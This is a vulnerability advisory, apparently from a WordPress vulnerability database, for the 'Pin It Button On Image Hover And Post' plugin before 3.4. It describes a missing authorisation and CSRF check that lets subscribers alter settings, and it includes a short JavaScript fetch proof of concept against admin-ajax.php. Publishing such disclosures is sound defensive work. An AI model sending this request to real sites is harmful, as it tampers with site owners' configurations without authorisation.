Weblizar Pin It Button On Image Hover And Post < 3.4 – Subscriber+ Arbitrary Settings Update | Plugin Vulnerabilities

Description

The plugin does not have authorisation and proper CSRF check when saving its settings, allowing any authenticated users, such as subscribers to update them

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"save_pinit", "PinItSettingNonce": "1", "PinItPost": 0}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) { console.log(data); });

Affects Plugins

pinterest-pin-it-button-on-image-hover-and-post

Fixed in 3.4

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

83961cce-646d-494d-a468-f5583ad83688

Timeline

Publicly Published

2022-04-04 (about 4 years ago)

Added

2022-04-04 (about 4 years ago)

Last Updated

2022-04-04 (about 4 years ago)

Other

Published

Title

Published

2025-06-12

Title

Arconix FAQ < 1.9.7 - Missing Authorization

Published

2025-04-10

Title

Industrial Lite <= 1.0.8 - Missing Authorization

Published

2024-12-20

Title

WP BASE Booking of Appointments, Services and Events < 5.0.0 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via app_export_db

Published

2025-10-16

Title

MeetingHub < 1.23.10 - Missing Authorization

Published

2025-06-25

Title

Post Carousel Slider for Elementor < 1.7.0 - Authenticated (Subscriber+) Missing Authorization via process_wbelps_promo_form Function